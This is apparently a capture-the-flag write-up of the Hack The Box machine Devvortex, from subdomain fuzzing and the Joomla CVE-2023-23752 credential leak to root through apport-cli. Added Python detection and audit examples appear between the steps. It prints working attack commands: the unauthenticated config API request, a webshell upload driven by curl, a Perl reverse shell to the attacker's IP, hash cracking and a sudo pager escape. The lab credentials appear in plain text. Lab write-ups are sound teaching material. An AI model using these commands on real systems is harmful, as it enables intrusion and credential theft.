![[Devvortex.png]]
Devvortex was an easy box that starts with an exposed website on port 80. After enumerating subdomains, the attacker comes across a hidden development subdomain with an exposed Joomla admin console that can be turned into RCE. The RCE led to a shell as www-data, which then led to a shell as a user, and then to root through a sudo misconfiguration.
With all these machines I typically start with a canned nmap scan covering all the bases and export it to a file in case I need it later.
```
nmap -sC -sV -p- --min-rate 1000 10.129.110.247
```
![[nmap-scan.png]]
Ports 22 and 80 are the only open ports. There is a redirect to http://devvortex.htb, so I'll go ahead and update my hosts file.
![[hostsFileDev.png]]
Navigating to the page on port 80 displayed a landing page for some kind of website design company called DevVortex.
![[initial-port-80.png]]
I did some fairly extensive directory enumeration with gobuster and came up with nothing interesting.
![[gobusterDev.png]]
I decided to check for subdomains, which is something I always forget to do. I checked using ffuf:
```
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb
```
Every nonexistent subdomain comes back with the same 154-byte response, so wait for that junk to show up, then filter it out by size:
```
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154
```
![[found-subdomain.png]]
Fantastic. I added the new entry to my hosts file and began some recon.
![[dev-devvortex-page.png]]
I looked around the HTML pages and found nothing interesting, mostly boilerplate. I started gobuster to look for something interesting and discovered 'administrator'.
![[gobuster-found-administrator.png]]
I immediately navigated to the administrator page and was greeted with a Joomla! admin login page. I tried some basic default creds and didn't get anywhere.
![[admin-console.png]]
I wanted to find the version to look for any low-hanging fruit. According to Google, the Joomla version is exposed in the manifest here:
```
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml
```
I was happy to see that this was publicly accessible, and it reported version 4.2.6.
![[version xml.png]]
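The version check above is something a defender can automate for their own inventory. The following is an added example, not code from the original writeup, that parses a manifest of the same shape as joomla.xml and compares the version against the first fixed release of CVE-2023-23752 (4.2.8). The manifest text below is constructed, and the comparison is done on integer tuples because a plain string comparison would rank "4.10.0" below "4.2.8".

```python
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for /administrator/manifests/files/joomla.xml; only the <version>
# element matters here and it carries the value the real manifest reported.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>4.2.6</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

# CVE-2023-23752 affects Joomla 4.0.0 through 4.2.7; 4.2.8 shipped the fix.
FIXED_VERSION = "4.2.8"


def parse_version(text):
    """Turn 'major.minor.patch' (any trailing suffix ignored) into a tuple of ints.

    Comparing tuples is the point: as strings, '4.10.0' < '4.2.8', which would
    wrongly mark a newer release as vulnerable.
    """
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def manifest_version(xml_text):
    """Extract the <version> value from a Joomla manifest document."""
    node = ET.fromstring(xml_text).find("version")
    if node is None or not node.text:
        raise ValueError("manifest has no <version> element")
    return node.text.strip()


def affected_by_cve_2023_23752(version):
    """True for Joomla 4.x releases older than the fixed version."""
    v = parse_version(version)
    return v[0] == 4 and v < parse_version(FIXED_VERSION)


if __name__ == "__main__":
    found = manifest_version(SAMPLE_MANIFEST)
    print(found, "vulnerable" if affected_by_cve_2023_23752(found) else "not affected")
```

The same manifest being world-readable is itself worth fixing on a production site, since it hands anyone the exact version to search for.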
According to Google, 4.2.6 is associated with CVE-2023-23752. I found an almost tailored PoC [here](https://vulncheck.com/blog/joomla-for-rce), "CVE-2023-23752 to Code Execution #1". The article mentions that the unauthenticated API endpoint exposes the database credentials when queried like this:
```
curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'
```
![[credentials-from-exploit 1.png]]
And sure enough, I was presented with creds.
```
"user": "lewis"
"password": "P4ntherg0t1n5r3c0n##"
```
I went ahead and attempted to log in as the user lewis, and logged right in!
![[logged-in-as-lewis.png]]
According to the article, we can either edit an existing template for RCE or upload our own extension. I tried modifying Cassiopeia but didn't have permissions; I did have permission to upload my own, so I uploaded a malicious one from [here](https://github.com/p0dalirius/Joomla-webshell-plugin).
```
git clone https://github.com/p0dalirius/Joomla-webshell-plugin.git
make
```
The malicious zip ends up in dist/. It can be uploaded through the extension installer here:
![[upload.png]]
```
http://dev.devvortex.htb/administrator/index.php?option=com_installer&view=install
curl -X POST 'http://dev.devvortex.htb/modules/mod_webshell/mod_webshell.php' --data "action=exec&cmd=id"
```
![[proof of RCE.png]]
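Everything up to this point, the vhost sweep, the unauthenticated config API read, and the direct requests to the uploaded module, leaves a trace in the web server's access log. The following is an added example, not part of the original writeup, that runs three simple detections over a handful of constructed log lines. It assumes a log format that records the requested Host as the first field (nginx's `$host`, which the default combined format does not include), and the distinct-Host threshold is my own choice.

```python
import re
from collections import defaultdict

# Constructed log lines in an assumed format: <host> <client> [<time>] "<request>" <status> <bytes>.
# The first five mimic a vhost sweep (every bogus Host gets the same 154-byte redirect), then the
# real dev vhost, the unauthenticated config API read, a direct hit on an uploaded module's PHP
# file, and two ordinary requests from another client.
SAMPLE_LOG = """\
aaa.devvortex.htb 10.10.14.3 [19/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 302 154
mail.devvortex.htb 10.10.14.3 [19/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 302 154
ftp.devvortex.htb 10.10.14.3 [19/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 302 154
www.devvortex.htb 10.10.14.3 [19/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 302 154
api.devvortex.htb 10.10.14.3 [19/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 302 154
dev.devvortex.htb 10.10.14.3 [19/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 23221
dev.devvortex.htb 10.10.14.3 [19/Jan/2024:10:05:40 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1402
dev.devvortex.htb 10.10.14.3 [19/Jan/2024:10:21:17 +0000] "POST /modules/mod_webshell/mod_webshell.php HTTP/1.1" 200 61
devvortex.htb 10.10.14.5 [19/Jan/2024:10:22:00 +0000] "GET /index.php HTTP/1.1" 200 18102
dev.devvortex.htb 10.10.14.5 [19/Jan/2024:10:22:01 +0000] "GET /media/system/js/core.min.js HTTP/1.1" 200 9031
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<client>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+)$'
)

# Joomla serves everything through its index.php front controllers; a request for some other
# .php file inside an extension directory is a strong sign an uploaded file is being driven directly.
EXTENSION_PHP_RE = re.compile(r"^/(modules|templates|plugins|components)/.+\.php$")
CONFIG_API_PREFIX = "/api/index.php/v1/config/application"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the assumed format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = int(entry["size"])
    return entry


def detect(log_text, vhost_threshold=5):
    """Run three detections and return (rule, client, detail) tuples."""
    findings = []
    hosts_by_client = defaultdict(set)
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        hosts_by_client[e["client"]].add(e["host"])
        path = e["path"].split("?", 1)[0].lower()
        # CVE-2023-23752: the config endpoint answered a request with no session or token.
        if path.startswith(CONFIG_API_PREFIX) and e["status"] == 200:
            findings.append(("config-api-read", e["client"], e["path"]))
        # Direct requests to PHP inside an extension directory (web shell style access).
        if EXTENSION_PHP_RE.match(path):
            findings.append(("direct-php-in-extension-dir", e["client"], e["path"]))
    # One client asking for many different Host names looks like a vhost wordlist sweep.
    for client, hosts in hosts_by_client.items():
        if len(hosts) >= vhost_threshold:
            findings.append(("vhost-fuzzing", client, f"{len(hosts)} distinct Host values"))
    return findings


if __name__ == "__main__":
    for rule, client, detail in detect(SAMPLE_LOG):
        print(f"{rule:28} {client:12} {detail}")
```

On a real deployment the vhost rule would want a time window as well, but even this crude version separates the sweep from the two clients that only ever asked for the names that exist.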
Very straightforward! I have RCE; now I want to turn this into a shell. Once I moved everything to Repeater I started testing for a good reverse shell command and settled on perl:
```
perl -e 'use Socket;$i="10.10.14.3";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
```
![[moved_to_repeater.png]]
I pasted this into Burp Suite's Repeater and URL-encoded the key characters (sorry, I don't have a screenshot of that). Then I set up a netcat listener:
```
nc -lvnp 443
```
![[set_up_listener.png]]
Then I clicked Send and had a shell as www-data.
![[proof_www_data.png]]
I upgraded my shell using Python:
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
I couldn't get my shell any better, but it didn't matter because I didn't have much left to do. My immediate reaction is to try
```
sudo -l
```
but nothing showed up, no surprise. It's www-data.
I checked /home and saw another user named logan. This matched what I saw in /etc/passwd.
I googled where Joomla keeps its MySQL credentials, since Joomla requires a database backend, and learned that they live in configuration.php in the root of the website files.
```
cat /var/www/dev.devvortex.htb/configuration.php
```
![[configuration-php.png]]
It was at this point that I realized I already had the MySQL credentials, so I logged into MySQL locally:
```
mysql -u lewis -p
# password: P4ntherg0t1n5r3c0n##
show databases;
use joomla;
show tables;
select * from sd4fg_users;
```
![[logan-mysql-creds.png]]
This gave me logan's password hash.
This is where I learned a valuable lesson: never try just one cracker. I immediately pasted the hash into CrackStation and it returned nothing, so I spent the next several hours looking around for anything else. I tried kernel exploits like PwnKit and tried the credentials I had everywhere, and nothing came up. I finally returned to the hash, since it had to be my way forward. I loaded the hash into a file:
```
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash
hashcat hash
```
hashcat identified this as a bcrypt (Blowfish) hash and suggested mode 3200, so that's what I used:
```
hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt
```
After a few minutes (I'm traveling, so I only had my slow laptop) it cracked!
```
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho
```
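The hash format is worth understanding from the defender's side, because the cost field in it is exactly what decides how long the cracking step above takes. The following is an added example, not code from the original writeup, that parses a bcrypt string into its fields and scales a measured guess rate across cost values. The guess rate and wordlist size used at the bottom are assumed numbers, not measurements from this box.

```python
import re

# bcrypt modular-crypt format: $<variant>$<cost>$<22-char salt><31-char digest>, both in
# bcrypt's own ./A-Za-z0-9 alphabet.  This sample is the hash shown above.
SAMPLE_HASH = "$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12"

BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)


def parse_bcrypt(s):
    """Split a bcrypt string into its fields, or return None if it is not one."""
    m = BCRYPT_RE.match(s.strip())
    if not m:
        return None
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:              # range bcrypt implementations accept
        return None
    return {
        "variant": m.group("variant"),   # $2y$ is what PHP's password_hash() (and so Joomla) emits
        "cost": cost,
        "rounds": 2 ** cost,             # key-setup iterations; each +1 on cost doubles the work
        "salt": m.group("salt"),
        "digest": m.group("digest"),
        "hashcat_mode": 3200,            # hashcat's "bcrypt $2*$, Blowfish (Unix)" mode
    }


def scale_rate(rate_at_ref, ref_cost, target_cost):
    """Guesses per second at target_cost, given a rate measured at ref_cost."""
    return rate_at_ref / 2 ** (target_cost - ref_cost)


def seconds_to_exhaust(wordlist_size, rate_at_ref, ref_cost, target_cost):
    """Worst-case time to run a whole wordlist against one hash at target_cost."""
    return wordlist_size / scale_rate(rate_at_ref, ref_cost, target_cost)


if __name__ == "__main__":
    print(parse_bcrypt(SAMPLE_HASH))
    # Assumed figures: a laptop CPU managing 1,000 guesses/s at cost 10, and a 14.3M-word list.
    for cost in (10, 12, 14):
        hours = seconds_to_exhaust(14_300_000, 1000, 10, cost) / 3600
        print(f"cost {cost}: about {hours:.1f} hours to exhaust the list")
```

The password still fell here because it was in rockyou, and no cost factor fixes that; what the cost does is make each guess expensive, which is why raising it from 10 to 12 quadruples the time for the same list.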
I immediately tried these credentials for logan:
```
ssh [email protected]
password: tequieromucho
```
I was very happy to see I had a shell with logan using ssh.
![[shell_as_logan.png]]
Grab the user flag!
![[userflag.png]]
My very first check is to see if logan has any sudo permissions.
```
sudo -l
```
And he does!
```
sudo /usr/bin/apport-cli
```
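A rule like this one is easy to miss in a sudoers review because the binary looks harmless. The following is an added example, not code from the original writeup, that parses sudoers-style user specifications and flags any that run an interactive program (pager or editor) as root, since those programs' shell escapes turn the rule into a root shell. The sudoers text is constructed in the shape of the rule sudo -l reported; the box's real /etc/sudoers was not shown, and the list of interactive commands is my own assumption.

```python
import re

# Constructed sudoers fragment in the shape of what `sudo -l` reported above; the box's real
# /etc/sudoers was not shown.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
logan   ALL=(ALL) /usr/bin/apport-cli
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/systemctl status nginx
"""

# Programs that drop the caller into a pager or editor once started; apport-cli is the one on this
# box (its report viewer hands off to a pager whose ! escape runs a shell).  The rest of the list
# is an assumption to extend as needed.
INTERACTIVE_COMMANDS = {"/usr/bin/apport-cli", "/usr/bin/less", "/usr/bin/more", "/usr/bin/vim", "/usr/bin/man"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return one dict per (user, command) pair from sudoers-style user specifications."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(ALL:ALL)" -> user part "ALL"; a missing Runas_Spec means root.
        runas = (m.group("runas") or "root").split(":")[0] or "root"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({
                "user": m.group("user"),
                "host": m.group("host"),
                "runas": runas,
                "nopasswd": "NOPASSWD" in tags,
                "cmd": cmd.strip(),
            })
    return rules


def audit(rules):
    """Flag rules that run an interactive program as root; the shell escape makes them root shells."""
    flagged = []
    for r in rules:
        binary = r["cmd"].split()[0]
        if r["runas"] in ("ALL", "root") and binary in INTERACTIVE_COMMANDS:
            flagged.append((r["user"], r["cmd"]))
    return flagged


if __name__ == "__main__":
    for user, cmd in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user}: '{cmd}' as root is an interactive program; expect a shell escape")
```

The deploy rules pass because systemctl with fixed arguments never hands the user a prompt, which is the property a narrow sudo rule should have.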
GTFOBins had nothing on apport-cli, but Google showed an easy exploit [here](https://github.com/diego-tella/CVE-2023-1326-PoC).
So I tried it exactly as mentioned.
```
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
```
But I got this:
![[apport-cli-fail.png]]
I had sudo rights for JUST apport-cli, so I played around with it until I could view a report.
```
sudo /usr/bin/apport-cli
4
v
!/bin/bash
```
![[got-root.png]]
And I had root! I grabbed the root flag!
![[root-flag 1.png]]
I enjoyed this machine. It was very straightforward and didn't pose any significant challenge, but I enjoyed it either way. Thanks for reading!